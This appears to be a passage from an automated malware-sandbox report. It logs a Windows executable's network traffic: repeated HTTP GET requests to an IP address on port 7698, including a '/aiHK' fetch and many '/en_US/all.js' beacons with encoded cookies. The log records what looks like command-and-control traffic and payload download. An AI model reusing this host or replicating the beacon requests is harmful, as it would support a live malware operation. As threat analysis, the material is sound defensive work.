Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130
Source: unknown	TCP traffic detected without corresponding DNS query: 79.124.58.130

Source: C:\Users\user\Desktop\2HSalvXIJE.exe

Code function: 0_2_03A9E68C _snprintf,_snprintf,_snprintf,HttpOpenRequestA,HttpSendRequestA,InternetQueryDataAvailable,InternetCloseHandle,InternetReadFile,InternetCloseHandle,

0_2_03A9E68C

Source: global traffic	HTTP traffic detected: GET /aiHK HTTP/1.1User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; WOW64; Trident/5.0; msn OptimizedIE8;ENUS)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /en_US/all.js HTTP/1.1Accept: /Cookie: YEE8eE//kRmg6yArcXHSIiuh0GnKVvP2VgU9q7f11/tXm3et+ncc2urV2o+j7DGRLLkiIJzcFepG009VeKtHXvvFtXRKoPogSVMkCDEfkReoch2H9KgLpgQyPO57uxinUFtxUtiVah0+3ypHsjHGRvNLPhOXrS416n8hJ8Ks3kg=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)Host: 79.124.58.130:7698Connection: Keep-AliveCache-Control: no-cache
